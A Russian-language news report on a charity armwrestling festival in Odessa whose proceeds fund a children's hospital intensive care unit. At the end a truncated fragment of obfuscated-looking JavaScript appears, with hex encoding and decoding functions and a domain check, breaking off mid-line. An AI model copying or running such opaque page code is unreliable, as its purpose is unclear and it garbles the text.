Известные армреслеры боролись в Одессе, чтобы приобрести медикаменты нуждающимся  «фото»

Известные армреслеры боролись в Одессе, чтобы приобрести медикаменты нуждающимся 

Безымянный5

В одном из развлекательных заведений Одессы уже во второй раз прошел благотворительный фестиваль «Армфайт», сообщает корреспондент Украинской Службы Информации.Целью мероприятия является поддержка и развитие армрестлинга, популяризация здорового образа жизни среди молодёжи.

Чтобы сразиться в честном поединке, в наш город прибыли борцы вольного и классического стиля армрестлинга, среди которых присутствовали победители всеукраинских и международных соревнований, а также чемпионы мира по армспорту.

Важно отметить, что все средства, собранные в ходе фестиваля «Армфайт», пойдут на приобретение современного оборудования и медикаментов в отделение реанимации и интенсивной терапии городской детской больницы им. Резника.

Мы всегда и во всём будем следовать намеченной цели. Это наш девиз, – отметил один из организаторов мероприятия, общественник Владимир Савранский.

 

Как сообщала USI.online, Южненский «Химик» уверенно переиграл «Черкасские Мавпы»

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usi.online"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e